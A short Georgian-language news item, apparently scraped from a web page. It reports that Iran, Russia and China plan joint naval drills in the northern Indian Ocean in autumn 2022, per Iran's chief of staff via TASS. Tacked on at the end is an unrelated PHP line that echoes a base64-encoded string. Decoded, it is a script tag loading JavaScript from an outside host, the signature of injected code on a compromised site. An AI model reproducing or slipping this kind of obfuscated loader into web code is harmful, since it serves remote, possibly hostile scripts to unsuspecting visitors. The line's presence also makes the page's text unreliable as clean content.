celsiusi
ავერსი საქკაბელი
ირანი, რუსეთი და ჩინეთი  შემოდგომაზე ერთობლივ საზღვაო წვრთნებს გამართავენ -  ინფორმაციას რუსული სამთავრობო მედია ТАСС ავრცელებს.
 
ირანის შეიარაღებული ძალების გენერალური შტაბის უფროსის, მუჰამედ ბაგერის ინფორმაციით წვრთნები 2022 წლის შემოდგომაზე ინდოეთის ოკეანის ჩრდილოეთ ნაწილში ჩატარდება. მისივე თქმით, წვრთნებს შესაძლოა ომანი და პაკისტანიც შეუერთდნენ.
 
"სამხედრო წვრთნები ირანის, რუსეთისა და ჩინეთის საზღვაო ძალების მონაწილეობით შემოდგომაზე ინდოეთის ოკეანის ჩრდილოეთ ნაწილში ჩატარდება“, - განაცხადა ბაგერმა
 
ცნობისთვის,  ირანმა, რუსეთმა და ჩინეთმა  ერთობლივი სამხედრო წვრთნები 1 სექტემბრიდან 7 სექტემბრის ჩათვლის Vostok-2022-ის  ფარგლებშიც გამართეს.
355
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");